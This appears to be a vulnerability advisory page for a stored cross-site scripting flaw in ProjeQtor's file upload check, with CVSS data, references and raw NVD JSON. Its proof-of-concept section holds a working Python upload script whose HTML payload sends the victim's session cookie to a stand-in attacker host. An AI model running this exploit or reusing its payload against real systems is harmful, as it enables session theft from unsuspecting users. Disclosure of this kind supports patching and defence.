CVE-2026-41467

Description

ProjeQtor versions 7.0 through 12.4.3 contain a stored cross-site scripting vulnerability in the file upload functionality where the checkValidFileName() function fails to restrict HTML and HTM file uploads. Authenticated attackers can upload HTML files containing arbitrary JavaScript through the image upload or attachment endpoints, and any user accessing the uploaded file URL will execute the embedded JavaScript in their browser.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

ProjeQtor 7.0 - 12.4.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Configuration
target_url = "http://target-projeqtor.com/tool/saveFile.php" # Example endpoint
login_url = "http://target-projeqtor.com/login.php"
username = "attacker"
password = "password"

# 1. Authenticate to get a valid session
session = requests.Session()
payload = {
    "loginName": username,
    "password": password
}
session.post(login_url, data=payload)

# 2. Prepare malicious HTML file (Stored XSS Payload)
# The vulnerability allows uploading HTML files via checkValidFileName bypass
html_content = """
<html>
<body>
<script>
    // Example: Steal session cookie
    fetch('http://attacker-server.com/steal?c=' + document.cookie);
    alert('XSS Triggered via CVE-2026-41467');
</script>
<h1>Malicious File</h1>
</body>
</html>
"""

files = {
    'file': ('exploit.html', html_content, 'text/html')
}

data = {
    'objectClass': 'Project',
    'objectId': '1'
}

# 3. Upload the malicious file
response = session.post(target_url, files=files, data=data)

if response.status_code == 200:
    print("[+] File uploaded successfully.")
    # In a real scenario, the response would contain the link to the uploaded file
    # e.g., http://target-projeqtor.com/files/exploit.html
else:
    print("[-] Upload failed.")
    print(response.text)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-41467
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-41467
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-41467/
[4] VulDB https://vuldb.com/cve/CVE-2026-41467
[5] https://damiri.fr/en/cves/CVE-2026-41467
[6] https://gryfman.fr/cves/CVE-2026-41467
[7] https://www.projeqtor.com
[8] https://www.vulncheck.com/advisories/projeqtor-stored-xss-via-checkvalidfilename

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-41467", "sourceIdentifier": "[email protected]", "published": "2026-04-27T16:16:46.137", "lastModified": "2026-04-27T18:35:53.583", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "ProjeQtor versions 7.0 through 12.4.3 contain a stored cross-site scripting vulnerability in the file upload functionality where the checkValidFileName() function fails to restrict HTML and HTM file uploads. Authenticated attackers can upload HTML files containing arbitrary JavaScript through the image upload or attachment endpoints, and any user accessing the uploaded file URL will execute the embedded JavaScript in their browser."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://damiri.fr/en/cves/CVE-2026-41467", "source": "[email protected]"}, {"url": "https://gryfman.fr/cves/CVE-2026-41467", "source": "[email protected]"}, {"url": "https://www.projeqtor.com", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/projeqtor-stored-xss-via-checkvalidfilename", "source": "[email protected]"}]}}